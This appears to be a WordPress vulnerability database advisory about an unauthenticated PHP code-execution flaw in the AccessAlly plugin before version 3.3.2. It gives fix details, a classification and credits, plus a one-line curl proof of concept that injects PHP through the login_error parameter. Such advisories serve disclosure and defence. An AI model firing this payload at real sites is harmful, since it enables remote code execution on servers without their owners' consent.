AccessAlly < 3.3.2 - Unauthenticated Arbitrary PHP Code Execution



Description
Prior to version 3.3.2, this plugin allowed arbitrary PHP code execution through the login_error function.

This exploit is out in the wild now and actively being exploited.
Proof of Concept
curl -Ls http://www.example.com/login/?login_error=%3C?%20$a%20=%20getcwd();%20echo%20$a;%20?%3E

Affects Plugin

fixed in version 3.3.2

References

URL https://accessally.com/blog/accessally-release-notes-3-3-2/

Classification

Type RCE
OWASP Top 10 A1: Injection
CWE CWE-94

Miscellaneous

Original Researcher Brad Patton
Submitter Brad Patton
Views 3935
Verified No
WPVDB ID 10039

Timeline

Publicly Published 2020-01-21 (5 months ago)
Added 2020-01-21 (5 months ago)
Last Updated 2020-02-20 (4 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin